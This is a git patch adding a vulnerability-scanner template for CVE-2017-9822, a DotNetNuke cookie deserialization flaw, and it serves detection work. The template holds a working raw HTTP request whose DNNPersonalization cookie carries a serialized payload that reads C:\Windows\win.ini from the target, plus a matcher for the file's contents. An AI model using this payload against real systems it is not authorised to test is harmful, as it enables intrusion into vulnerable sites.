From f78452e8087faac9a1fbd566d85b315b38f6ff03 Mon Sep 17 00:00:00 2001 From: Keith Date: Wed, 30 Jun 2021 19:32:59 +0800 Subject: [PATCH] Add CVE-2017-9822.yaml - DotNetNuke Cookie Deserialization Remote Code Execution (RCE) --- cves/2017/CVE-2017-9822.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2017/CVE-2017-9822.yaml diff --git a/cves/2017/CVE-2017-9822.yaml b/cves/2017/CVE-2017-9822.yaml new file mode 100644 index 0000000000..62d48773dc --- /dev/null +++ b/cves/2017/CVE-2017-9822.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-9822 + +info: + name: DotNetNuke Cookie Deserialization Remote Code Execution (RCE) + author: milo2012 + severity: high + description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE). + tags: cve,cve2017,dotnetnuke,bypass + reference: https://github.com/murataydemir/CVE-2017-9822 + +requests: + - raw: + - | + GET /__ HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 + Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 + Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 + Accept-Encoding: gzip, deflate + X-Requested-With: XMLHttpRequest + Connection: close + Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini + + matchers-condition: and + matchers: + - type: word + words: + - '[extensions]' + part: body